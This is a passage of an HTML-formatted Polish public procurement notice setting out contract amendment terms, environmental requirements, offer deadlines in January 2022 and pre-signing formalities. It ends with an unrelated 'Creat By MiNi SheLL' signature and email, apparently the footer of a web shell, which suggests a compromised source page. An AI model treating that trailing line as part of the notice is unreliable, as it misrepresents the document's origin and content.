do ustanowienia pełnomocni-ka <br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępo-waniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/>Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie <br/>z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy (wzór umowy) , które zostaną wprowadzone <br/>do umowy w sprawie zamówienia publicznego –zawarte są w załączniku nr 3 do SWZ.<br/>2.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w przypadkach opisanych w projektowanych postanowieniach umowy- załącznik nr 3 do SWZ.<br/>3.	Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.<br/>4.	Inicjatorem zmian w umowie mogą być obie strony umowy, z tym że ostateczna decyzja co do wprowadzenia zmian i ich zakresu należy do Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem kanału elektronicznej komunikacji pod adresem: https://www.soldea.pl/epz/epz/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-12 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Informacja o formalnościach, jakie powinny zostać dopełnione <br/>po wyborze oferty, w celu zawarcia umowy w sprawie zamówienia publicznego<br/>1.	Zamawiający zawrze umowę w sprawie zamówienia publicznego z Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą, w terminach określonych <br/>w art. 308 ust. 2 lub 3 ustawy Pzp. <br/>2.	Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>3.	Wybrany w drodze niniejszego postępowania Wykonawca winien przed podpisaniem umowy złożyć Zamawiającemu: <br/>1)	informacje niezbędne do wypełnienia treści umowy na wezwanie Zamawiające-go;<br/>2)	pełnomocnictwo, chyba że dokumentach postępowania znajdują się dokumenty lub pełnomocnictwa upoważaniające osoby lub osobę do podpisania umowy <br/>w sprawie udzielenia zamówienia publicznego w imieniu Wykonawcy lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia pu-blicznego;<br/>3)	ewentualny wykaz podwykonawców.<br/>4.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, <br/>są zobowiązani przedstawić Zamawiającemu kopię umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5.	Niedopełnienie ww. formalności, nieprzedłożenie ww. dokumentów przez Wykonawcę w wyznaczonym przez Zmawiającego terminie, przed podpisaniem umowy, rozumiane będzie przez Zamawiającego, jako uchylanie się przez Wykonawcę od zawarcia Umowy oraz będzie potraktowane przez Zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia publicznego z przyczyn leżących po stronie Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com